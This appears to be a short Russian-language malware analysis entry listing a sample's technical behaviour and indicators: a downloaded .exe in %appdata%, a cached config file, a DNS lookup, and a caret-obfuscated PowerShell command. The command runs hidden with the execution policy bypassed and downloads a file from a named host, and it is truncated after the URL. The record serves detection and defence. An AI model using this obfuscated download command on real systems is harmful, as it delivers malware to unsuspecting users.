Техническая информация
- http://ltmp.topiford.pl/file/hen.bhj как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poW^ERS^HELl.Exe -eXeC^u^T^IOn^poliCy b^y^PAS^s^ -No^prOfIL^e ^-^wi^ndoWst^Yle ^hiDdE^N (N^eW^-O^B^jeCT S^Ystem^.^nET.weBc^lIent)^.doWNL^oaDf^ilE(^'http://ltmp.topiford.pl/...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK lt##.#opiford.pl
- '<SYSTEM32>\cmd.exe' /C "poW^ERS^HELl.Exe -eXeC^u^T^IOn^poliCy b^y^PAS^s^ -No^prOfIL^e ^-^wi^ndoWst^Yle ^hiDdE^N (N^eW^-O^B^jeCT S^Ystem^.^nET.weBc^lIent)^.doWNL^oaDf^ilE(^'http://ltmp.topiford.pl/... (со скрытым окном)